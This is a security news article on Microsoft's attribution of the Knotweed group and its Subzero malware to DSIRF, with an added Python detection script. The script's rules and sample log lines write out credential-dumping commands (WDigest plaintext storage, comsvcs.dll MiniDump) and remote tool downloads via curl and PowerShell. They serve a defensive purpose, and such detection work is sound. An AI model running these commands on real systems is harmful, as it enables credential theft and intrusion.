Microsoft reports that the Knotweed hacking group is linked to the Austrian spyware vendor DSIRF, which also frequently operates as a cyber mercenary. Researchers have determined that Knotweed is attacking European and Central American organizations using the Subzero malware toolkit.
Let me remind you that we also wrote that experts linked the BlackCat (ALPHV) ransomware to the BlackMatter and DarkSide groups, and that Evil Corp ransomware is posing as the PayloadBin group to avoid US sanctions.
On its official website, DSIRF advertises itself as a company engaged in data analytics, cyber forensics, and data-driven intelligence. However, Microsoft associates the company with the Subzero malware, which DSIRF clients can use to compromise targets' phones, computers, network devices, and so on.
Earlier, while studying the Knotweed attacks, the security company RiskIQ also found that the infrastructure serving the malware since February 2020 may be associated with DSIRF, including the company's official website and domains, which were probably used to debug and stage Subzero.
Now, Microsoft Threat Intelligence Center (MSTIC) analysts describe multiple links between DSIRF and the malicious tools used in Knotweed attacks. These include the C&C infrastructure used by the malware; a DSIRF-linked GitHub account that was used in one of the attacks; a code-signing certificate issued to DSIRF and used to sign an exploit; and other public reports that tie Subzero directly to DSIRF.
Microsoft has studied some of the Knotweed attacks and found that they targeted law firms, banks, and consulting organizations around the world, including in Austria, the UK, and Panama.
On compromised devices, the attackers deployed Corelump, the main payload, which runs from memory to avoid detection, as well as Jumplump, a heavily obfuscated loader that downloads Corelump and loads it into memory.
The main Subzero payload has many features, including keystroke interception, screen capture, data theft, as well as launching remote shells and arbitrary plugins downloaded from the control server.
On compromised systems where Knotweed deployed its malware, Microsoft observed various post-compromise actions, including:
- setting the UseLogonCredential registry value to "1" to enable plaintext credential storage;
- dumping credentials via comsvcs.dll;
- attempting to access email with the dumped credentials from a Knotweed IP address;
- using curl to download Knotweed tools from file shares, including vultrobjects[.]com;
- running PowerShell scripts directly from GitHub, from an account associated with DSIRF.
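As an added example (not from the original article, nor from Microsoft or DSIRF), the following Python detection logic turns the four host-level behaviours listed above into rules and runs them over constructed Sysmon-style log lines; the flattened field layout, the rule names and every sample value are assumptions made for this example.

```python
import re

# Detection rules for the post-compromise behaviours listed above, written as
# regexes over a flattened "Field=Value ..." representation of Sysmon events
# (EventID 13 = registry value set, EventID 1 = process creation). The field
# layout and all sample values are constructed for this example.
RULES = [
    # WDigest\UseLogonCredential set to 1: plaintext credentials become recoverable
    ("wdigest_plaintext_creds_enabled",
     re.compile(r"EventType=SetValue.*\\WDigest\\UseLogonCredential\b.*Details=DWORD \(0x0*1\)", re.I)),
    # rundll32 invoking the MiniDump export of comsvcs.dll (credential dumping)
    ("comsvcs_minidump_credential_dump",
     re.compile(r"Image=.*\\rundll32\.exe.*comsvcs\.dll.*MiniDump", re.I)),
    # curl fetching from the vultrobjects[.]com file share named in the report
    ("curl_download_from_vultrobjects",
     re.compile(r"Image=.*\\curl\.exe.*vultrobjects\.com", re.I)),
    # PowerShell pulling a script straight from GitHub raw content
    ("powershell_script_from_github",
     re.compile(r"Image=.*\\powershell\.exe.*raw\.githubusercontent\.com", re.I)),
]


def scan(lines):
    """Return [(line_number, rule_name)] for every log line that matches a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((number, name))
    return hits


# Constructed sample telemetry (not real logs); <...> marks placeholder values.
SAMPLE_LOG = [
    "EventID=13 EventType=SetValue TargetObject=HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential Details=DWORD (0x00000001)",
    "EventID=1 Image=C:\\Windows\\System32\\rundll32.exe CommandLine=rundll32.exe comsvcs.dll MiniDump <pid> <outfile> full",
    "EventID=1 Image=C:\\Windows\\System32\\curl.exe CommandLine=curl.exe -o <outfile> https://<bucket>.vultrobjects.com/<path>",
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine=powershell.exe -NoProfile -Command <run script from https://raw.githubusercontent.com/<account>/<repo>/<script>.ps1>",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
    # Benign: the value being set back to 0 must not fire the WDigest rule
    "EventID=13 EventType=SetValue TargetObject=HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential Details=DWORD (0x00000000)",
]

if __name__ == "__main__":
    for number, name in scan(SAMPLE_LOG):
        print(f"line {number}: {name}")
```

Only the first four sample lines fire; the ordinary notepad launch and the reset of UseLogonCredential to 0 produce no hits.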
Among the 0-day vulnerabilities that Knotweed used in its campaigns, Microsoft highlights the recently fixed CVE-2022-22047, which allowed attackers to elevate privileges, escape the sandbox, and achieve system-level code execution.
In addition, last year Knotweed used an exploit chain consisting of two Windows privilege escalation vulnerabilities (CVE-2021-31199 and CVE-2021-31201) in combination with an exploit for an Adobe Reader vulnerability (CVE-2021-28550). All these bugs were fixed in June 2021.
Also in 2021, the group was associated with the exploitation of a fourth 0-day, a privilege escalation vulnerability in the Windows Update Medic Service (CVE-2021-36948). This bug was used to force the loading of an arbitrary signed DLL.